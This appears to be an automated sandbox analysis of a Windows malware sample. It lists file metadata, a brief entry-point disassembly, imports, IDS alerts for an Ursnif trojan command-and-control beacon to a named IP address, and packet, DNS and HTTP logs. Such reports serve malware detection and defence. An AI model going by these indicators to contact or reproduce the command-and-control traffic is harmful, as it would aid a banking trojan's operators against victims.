                                                          Thumbprint SHA-1:9B93192A2BF5E6EC0A32E4966431D1E2FD1FA4AF
                                                          Thumbprint SHA-256:97135CBA56D0300287DF31C8B39546AD4605FB9C88311AEB0B12B76AC15C46BF
                                                          Serial:0A2787FBB4627C91611573E323584113
                                                          Instruction
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          call 00007FEAECD8B32Bh
                                                          call 00007FEAECD8B036h
                                                          pop ebp
                                                          ret
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          push FFFFFFFEh
                                                          push 00511B30h
                                                          push 00416210h
                                                          mov eax, dword ptr fs:[00000000h]
                                                          push eax
                                                          add esp, FFFFFF98h
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          mov eax, dword ptr [00513064h]
                                                          xor dword ptr [ebp-08h], eax
                                                          xor eax, ebp
                                                          push eax
                                                          lea eax, dword ptr [ebp-10h]
                                                          mov dword ptr fs:[00000000h], eax
                                                          mov dword ptr [ebp-18h], esp
                                                          mov dword ptr [ebp-70h], 00000000h
                                                          lea eax, dword ptr [ebp-60h]
                                                          push eax
                                                          call dword ptr [00401044h]
                                                          cmp dword ptr [00515DDCh], 00000000h
                                                          jne 00007FEAECD8B010h
                                                          push 00000000h
                                                          push 00000000h
                                                          push 00000001h
                                                          push 00000000h
                                                          call dword ptr [00401040h]
                                                          call 00007FEAECD8B193h
                                                          mov dword ptr [ebp-6Ch], eax
                                                          call 00007FEAECD8F16Bh
                                                          test eax, eax
                                                          jne 00007FEAECD8B00Ch
                                                          push 0000001Ch
                                                          call 00007FEAECD8B150h
                                                          add esp, 04h
                                                          call 00007FEAECD8EAC8h
                                                          test eax, eax
                                                          jne 00007FEAECD8B00Ch
                                                          push 00000010h
                                                          call 00007FEAECD8B13Dh
                                                          Programming Language:
                                                          • [LNK] VS2010 build 30319
                                                          • [ASM] VS2010 build 30319
                                                          • [ C ] VS2010 build 30319
                                                          • [C++] VS2010 build 30319
                                                          • [RES] VS2010 build 30319
                                                          • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x112114 | 0x50 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x116000 | 0x17630 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x12de00 | 0x1438 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12e000 | 0x1638 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1180 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x8118 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x140 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x11184a | 0x111a00 | False | 0.832347104842 | data | 7.57139474025 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x113000 | 0x2de0 | 0x1000 | False | 0.190673828125 | data | 2.23907016207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x116000 | 0x17630 | 0x17800 | False | 0.692538646941 | data | 6.63567575561 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x12e000 | 0x36a4 | 0x3800 | False | 0.331473214286 | data | 3.51322756003 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x1163d0 | 0xd633 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_ICON | 0x123a08 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0x127c30 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0x12a1d8 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 41910143 | |
RT_ICON | 0x12b280 | 0x988 | data | |
RT_ICON | 0x12bc08 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_MENU | 0x12d380 | 0x4 | data | |
RT_DIALOG | 0x12d388 | 0xf0 | data | |
RT_DIALOG | 0x12d478 | 0x88 | data | |
RT_DIALOG | 0x12d500 | 0x12c | data | |
RT_STRING | 0x12c2b8 | 0x1e8 | data | |
RT_STRING | 0x12c4a0 | 0x424 | data | |
RT_STRING | 0x12c8c8 | 0x43c | data | |
RT_STRING | 0x12cd08 | 0x4fc | data | |
RT_STRING | 0x12d208 | 0x174 | data | |
RT_GROUP_ICON | 0x12c070 | 0x5a | data | |
RT_VERSION | 0x12c0d0 | 0x1e4 | data | |
DLL | Import
KERNEL32.dll | GetProcAddress, GetTapeStatus, Sleep, LocalAlloc, CloseHandle, CreateActCtxW, SetCurrentDirectoryA, LoadLibraryW, GetModuleHandleW, ResetEvent, GetCommandLineW, HeapSetInformation, GetStartupInfoW, SetUnhandledExceptionFilter, QueryPerformanceCounter, GetTickCount, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, InterlockedIncrement, InterlockedDecrement, DecodePointer, ExitProcess, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, HeapValidate, IsBadReadPtr, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetLastError, HeapCreate, WriteFile, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, EnterCriticalSection, LeaveCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetModuleFileNameA, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, IsProcessorFeaturePresent, SetFilePointer, GetConsoleCP, GetConsoleMode, RaiseException, SetStdHandle, CreateFileW, FlushFileBuffers
GDI32.dll | StrokePath
ADVAPI32.dll | StartServiceA, CloseEventLog
Description | Data
LegalCopyright | Copyright 2012-2022 by Kone LLC All Rights Reserved.
FileVersion | 87.90.67.49
ProductVersion | 70.56.51.66
Translation | 0x0838 0x03a4
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/19/22-14:41:40.292996 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49702 | 80 | 192.168.2.3 | 52.169.118.173
05/19/22-14:41:40.292996 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49702 | 80 | 192.168.2.3 | 52.169.118.173
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          May 19, 2022 14:41:41.020664930 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020683050 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020711899 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020721912 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020740032 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020755053 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020766020 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020795107 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020808935 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020859957 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020874023 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020885944 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020908117 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020915031 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020944118 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020956993 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020970106 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020992994 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020996094 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021024942 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021029949 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021050930 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021076918 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021079063 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021106958 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021112919 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021128893 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021157980 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021161079 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021183968 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021207094 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021210909 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021239996 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021250963 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021272898 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021296024 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021300077 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021327972 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021339893 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021353006 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021380901 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021392107 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021409035 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021436930 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021439075 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021466017 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021471024 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021492004 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021513939 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021519899 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021568060 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021615028 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.022139072 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.022201061 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.022303104 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.022332907 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.022357941 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.022360086 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.022386074 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.022425890 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.023010969 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.023055077 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.023082972 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.023118973 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.023147106 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.023173094 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.023196936 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.023222923 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024192095 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024243116 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024272919 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024274111 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024311066 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024316072 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024352074 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024360895 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024377108 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024395943 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024405956 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024435043 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024435997 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024461985 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024497986 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024513960 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024535894 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024540901 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024571896 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024580002 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024602890 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024626970 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024636030 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024661064 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024667978 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024699926 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024708033 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024729013 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024750948 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024761915 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024785995 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024791956 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024828911 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024832010 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024857044 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024868965 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024888039 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024908066 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024919987 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024945021 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024950027 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024985075 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024992943 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025013924 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025038958 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025043964 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025079966 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025089979 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025114059 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025142908 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025146008 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025168896 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025201082 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025204897 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025228977 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025243044 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025263071 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025290966 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025291920 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025319099 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025355101 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025358915 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025383949 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025386095 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025417089 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025446892 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025449038 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025475979 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025494099 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025509119 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025542974 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025549889 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025574923 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025599003 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025610924 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025635004 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025640965 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025670052 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025691032 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025688887 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025711060 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025732040 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025736094 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025753975 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025777102 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025789022 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025798082 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025819063 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025821924 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025841951 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025862932 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025882959 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025883913 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025907040 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025928974 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025952101 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025952101 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025974035 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025990963 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025995016 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026017904 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026040077 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026041031 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.026062965 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026083946 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.026086092 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026108027 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026130915 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026130915 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.026154041 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026170969 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026173115 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.026210070 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.026252985 CEST4970380192.168.2.313.107.40.203
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 19, 2022 14:41:40.197166920 CEST | 51229 | 53 | 192.168.2.3 | 8.8.8.8
May 19, 2022 14:41:40.389507055 CEST | 64851 | 53 | 192.168.2.3 | 8.8.8.8
May 19, 2022 14:41:40.408665895 CEST | 53 | 64851 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 19, 2022 14:41:40.197166920 CEST | 192.168.2.3 | 8.8.8.8 | 0x918e | Standard query (0) | anm.msn.com | A (IP address) | IN (0x0001)
May 19, 2022 14:41:40.389507055 CEST | 192.168.2.3 | 8.8.8.8 | 0x35a | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 19, 2022 14:41:40.229801893 CEST | 8.8.8.8 | 192.168.2.3 | 0x918e | No error (0) | anm.msn.com | redirection.prod.cms.msn.com | | CNAME (Canonical name) | IN (0x0001)
May 19, 2022 14:41:40.229801893 CEST | 8.8.8.8 | 192.168.2.3 | 0x918e | No error (0) | redirection.prod.cms.msn.com | redirection.prod.cms.msn.com.akadns.net | | CNAME (Canonical name) | IN (0x0001)
May 19, 2022 14:41:40.408665895 CEST | 8.8.8.8 | 192.168.2.3 | 0x35a | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001)
May 19, 2022 14:41:40.408665895 CEST | 8.8.8.8 | 192.168.2.3 | 0x35a | No error (0) | www-msn-com.a-0003.a-msedge.net | icePrime.a-0003.dc-msedge.net | | CNAME (Canonical name) | IN (0x0001)
May 19, 2022 14:41:40.408665895 CEST | 8.8.8.8 | 192.168.2.3 | 0x35a | No error (0) | icePrime.a-0003.dc-msedge.net | a-0003.fbs2-a-msedge.net | | CNAME (Canonical name) | IN (0x0001)
May 19, 2022 14:41:40.408665895 CEST | 8.8.8.8 | 192.168.2.3 | 0x35a | No error (0) | a-0003.fbs2-a-msedge.net | | 13.107.40.203 | A (IP address) | IN (0x0001)
• www.msn.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49703 | 13.107.40.203 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | kBytes transferred | Direction | Data
May 19, 2022 14:41:40.455178022 CEST | 109 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Connection: Keep-Alive
Cache-Control: no-cache
Host: www.msn.com
May 19, 2022 14:41:40.559830904 CEST | 110 | IN | HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, no-transform
Pragma: no-cache
Content-Length: 142
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://www.msn.com/de-ch/
Vary: User-Agent
Set-Cookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgyMDA5NjkwMDQ5NzI5NzksIlZlcnNpb24iOjF90; domain=msn.com; expires=Fri, 19-May-2023 12:41:40 GMT; path=/; HttpOnly
Set-Cookie: marketPref=de-ch; domain=msn.com; expires=Fri, 19-May-2023 12:41:40 GMT; path=/; HttpOnly
Access-Control-Allow-Origin: *
X-AspNetMvc-Version: 5.2
X-AppVersion: 20220517_28677693
X-Activity-Id: efab37a0-e368-4926-ad9f-55ad4ca02ec9
X-Az: {did:2be360ae5c6345da911d978376c0449f, rid: 20, sn: neurope-prod-hp, dt: 2022-05-18T22:13:14.6536596Z, bt: 2022-05-17T20:41:53.5606999Z}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
X-UA-Compatible: IE=Edge;chrome=1
X-Content-Type-Options: nosniff
X-FRAME-OPTIONS: SAMEORIGIN
X-Powered-By: ASP.NET
Ac
May 19, 2022 14:41:40.559859991 CEST | 111 | IN | Data Raw: 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 48 45 41 44 2c 47 45 54 2c 4f 50 54 49 4f 4e 53 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 0d 0a 58 2d 43 61 63 68 65 3a 20 43 4f 4e 46 49 47 5f
Data Ascii: ess-Control-Allow-Methods: HEAD,GET,OPTIONSX-XSS-Protection: 1X-Cache: CONFIG_NOCACHEX-MSEdge-Ref: Ref A: EFAB37A0E3684926AD9F55AD4CA02EC9 Ref B: HEL01EDGE1020 Ref C: 2022-05-19T12:41:40ZDate: Thu, 19 May 2022 12:41:39 GMT<html><he
May 19, 2022 14:41:40.597235918 CEST | 111 | OUT | GET /de-ch/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Connection: Keep-Alive
Cache-Control: no-cache
Host: www.msn.com
Cookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgyMDA5NjkwMDQ5NzI5NzksIlZlcnNpb24iOjF90; marketPref=de-ch
May 19, 2022 14:41:40.899105072 CEST | 113 | IN | HTTP/1.1 200 OK
